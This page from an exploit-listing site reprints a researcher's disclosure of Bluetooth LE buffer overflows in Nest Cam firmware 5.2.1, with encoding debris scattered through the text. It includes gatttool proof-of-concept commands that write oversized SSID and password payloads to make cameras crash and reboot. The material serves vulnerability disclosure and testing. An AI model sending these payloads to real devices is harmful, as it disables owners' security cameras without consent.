Advertisement






Google Nest Cam 5.2.1 Buffer Overflow

CVE Category Price Severity
N/A CWE-119 Buffer Errors Unknown Critical
Author Risk Exploitation Type Date
Unknown High Remote 2017-03-21
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017030188

Below is a copy:

Google Nest Cam 5.2.1 Buffer Overflow# Exploit Title: Google Nest Cam - Multiple Buffer Overflow Conditions Over Bluetooth LE
# Reported to Google: October 26, 2016
a"# Public Disclosure: March 17, 2017
# Exploit Author: Jason Doyle @_jasondoyle
# Vendor Homepage: https://nest.com/
# Affected: Dropcam, Dropcam Pro, Nest Cam Indoor/Outdoor modelsa"
# Tested Version: 5.2.1a"
# Fixed Version: TBD
# https://github.com/jasondoyle/Google-Nest-Cam-Bug-Disclosures/blob/master/README.mda"
 
==Bluetooth (BLE) based Buffer Overflow via SSID parameter==
 
1. Summarya"
 
It's possible to trigger a buffer overflow condition when setting the SSID parameter on the camera. The attacker must be in bluetooth range at any time during the cameras powered on state. Bluetooth is never disabled even after initial setup.
 
2. Proof of Concept
 
a"anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -Ia"
[18:B4:30:5D:00:B8][LE]> connecta"
Attempting to connect to 18:B4:30:5D:00:B8a"
Connection successful
a"[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a031201AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
a"[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3ba"
Characteristic value was written successfully
a"Characteristic value was written successfullya"
[18:B4:30:5D:00:B8][LE]>a"(gatttool:20352): GLib-WARNING **: Invalid file descriptor.
 
3. Details 
 
The payload attempts to set an SSID with a length of 1 byte and sends 16.a"SequenceNum=3a + Type=0312 + Length=01 + Value=AA*16
 
4. Resulta"
 
Crash and reboot back to operational state
 
 
==Bluetooth (BLE) based Buffer Overflow via Encrypted Password parameter==
 
1. Summarya"
 
It's possible to trigger a buffer overflow condition when setting the encrypted password parameter on the camera. The attacker must be in bluetooth range at any time during the cameras powered on state. Bluetooth is never disabled even after initial setup.
 
2. Proof of Concepta"
 
anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -Ia"
[18:B4:30:5D:00:B8][LE]> connect
a"Attempting to connect to 18:B4:30:5D:00:B8a"
Connection successfula"
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a03120b506574536d6172742d356e1a01AAAAAA
a"[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3ba"
Characteristic value was written successfully
a"Characteristic value was written successfully
a"[18:B4:30:5D:00:B8][LE]>a"(gatttool:20352): GLib-WARNING **: Invalid file descriptor.
 
3. Detailsa"
 
The payload attempts to set the encrypted wifi password with a length of 1 byte and sends 3.a"SequenceNum=3a + Type=0312 + Length=0b + ssidVal=506574536d6172742d356e + type=1a + length=01 + encPass=AA*3



Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum